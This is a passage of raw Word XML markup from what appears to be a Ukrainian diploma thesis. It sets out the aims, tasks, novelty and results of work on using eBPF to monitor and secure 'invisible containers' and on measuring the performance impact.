      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>випадки використання eBPF для “невидимих контейнерів”</w:t>
      </w:r>
      <w:r w:rsidRPr="009A4CE1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, його вплив на продуктивність та ефективність роботи контейнеризованих середовищ, а також забезпечення безпеки та прозорості. Оцінюються переваги, обмеження та ефективність застосування eBPF для моніторингу таких контейнерів у реальних умовах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A4CE1" w:rsidRDefault="00B01357" w:rsidP="00B01357">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B01357">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Об’єктом</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> дослідження є інтеграція технології eBPF</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01357">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в контейнерні системи, зокрема її застосування для моніторингу, безпеки та підвищення</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ефективності роботи невидимих контейнерів</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01357">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в сучасних ІТ-інфраструктурах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01357" w:rsidRDefault="00B01357" w:rsidP="00B01357">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B01357">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Предметом</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> дослідження є </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01357">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>розробка про</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>цесу інтеграції технології eBPF</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01357">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в контейнерні системи для моніторингу, забезпечення безпеки та оптимізації продуктивності, зокрема для невидимих контейнерів, у сучасних ІТ-інфраструктурах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE06DF" w:rsidRPr="0062398D" w:rsidRDefault="00CE06DF" w:rsidP="00CE06DF">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0062398D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Відповідно до визначеної мети в дипломній роботі поставлені, і вирішені наступні задачі:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01357" w:rsidRDefault="00CE06DF" w:rsidP="00CE06DF">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62398D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>- </w:t>
      </w:r>
      <w:r w:rsidR="002D0A52" w:rsidRPr="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Розроб</w:t>
      </w:r>
      <w:r w:rsidR="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">лено </w:t>
      </w:r>
      <w:r w:rsidR="002D0A52" w:rsidRPr="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>метод</w:t>
      </w:r>
      <w:r w:rsidR="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">и інтеграції </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D0A52" w:rsidRPr="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> з платформами контейнеризації</w:t>
      </w:r>
      <w:r w:rsidR="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та здійснено о</w:t>
      </w:r>
      <w:r w:rsidR="002D0A52" w:rsidRPr="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>цінк</w:t>
      </w:r>
      <w:r w:rsidR="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">у можливостей </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D0A52" w:rsidRPr="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для підвищення безпеки, моніторингу та продуктивності </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D0A52" w:rsidRPr="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>контейнеризованих</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D0A52" w:rsidRPr="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> середовищ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5FBE" w:rsidRDefault="002D0A52" w:rsidP="002D0A52">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62398D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>- </w:t>
      </w:r>
      <w:r w:rsidRPr="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Розроб</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>лено</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> та </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>протестовано сценарії навантаження</w:t>
      </w:r>
      <w:r w:rsidRPr="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">проведення </w:t>
      </w:r>
      <w:r w:rsidRPr="002D0A52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>оцінки впливу eBPF на продуктивність контейнерних систем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D0A52" w:rsidRDefault="00782BA2" w:rsidP="00782BA2">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0C4084">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Наукова новизна</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> роботи </w:t>
      </w:r>
      <w:r w:rsidRPr="00135327">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>полягає в</w:t>
      </w:r>
      <w:r w:rsidRPr="00782BA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> розробці </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>сучасного</w:t>
      </w:r>
      <w:r w:rsidRPr="00782BA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> мето</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ду інтеграції технології eBPF</w:t>
      </w:r>
      <w:r w:rsidRPr="00782BA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> для моніторингу та забезпечення безпеки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“невидимих контейнерів”</w:t>
      </w:r>
      <w:r w:rsidRPr="00782BA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в сучасних контейнеризованих середовищах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00782BA2" w:rsidRDefault="00782BA2" w:rsidP="00782BA2">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Методи дослідження</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для вирішення поставлених задач в дипломній роботі використовувалися методи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">пізнання, </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">системного </w:t>
      </w:r>
      <w:r w:rsidRPr="00066E04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>аналізу</w:t>
      </w:r>
      <w:r w:rsidRPr="00066E04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00066E04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>і експерименту.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00782BA2" w:rsidRPr="0005221D" w:rsidRDefault="00782BA2" w:rsidP="00782BA2">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0005221D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Основні результати, отримані в дипломній </w:t>
      </w:r>
      <w:r w:rsidRPr="00066E04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>роботі</w:t>
      </w:r>
      <w:r w:rsidRPr="00066E04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> що виносяться на захист:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00782BA2" w:rsidRDefault="00782BA2" w:rsidP="00782BA2">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1. М</w:t>
      </w:r>
      <w:r w:rsidRPr="00782BA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ето</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>д інтеграції технології eBPF</w:t>
      </w:r>
      <w:r w:rsidRPr="00782BA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> для моніторингу та забезпечення безпеки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“невидимих контейнерів”</w:t>
      </w:r>
      <w:r w:rsidRPr="00782BA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в сучасних контейнеризованих середовищах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00910805" w:rsidRDefault="00782BA2" w:rsidP="00910805">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C92BAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Отже розроблений інструмент</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00910805" w:rsidRPr="00797EE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">має значний практичний потенціал завдяки застосуванню eBPF для моніторингу невидимих контейнерів. Дослідження демонструє високий потенціал цієї технології в покращенні безпеки та моніторингу складних середовищ, де традиційні інструменти можуть бути менш ефективними або навіть непридатними. Зокрема, було підтверджено, що за допомогою eBPF можна створювати потужні системи моніторингу, які працюють на рівні ядра </w:t>
      </w:r>
      <w:r w:rsidR="00910805">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00910805" w:rsidRPr="00797EE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> та не потребують безпосереднього втручання в роботу самих контейнерів. Це особливо важливо для невидимих контейнерів, які можуть бути важко доступними для стандартних засобів моніторингу, що підвищує ефективність виявлення та реагування на потенційні загрози в таких середовищах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00782BA2" w:rsidRDefault="00782BA2" w:rsidP="00782BA2">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7C3ACC" w:rsidRDefault="007C3ACC">
      <w:pP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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C3ACC" w:rsidRPr="00172EF0" w:rsidRDefault="007C3ACC" w:rsidP="00172EF0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172EF0">
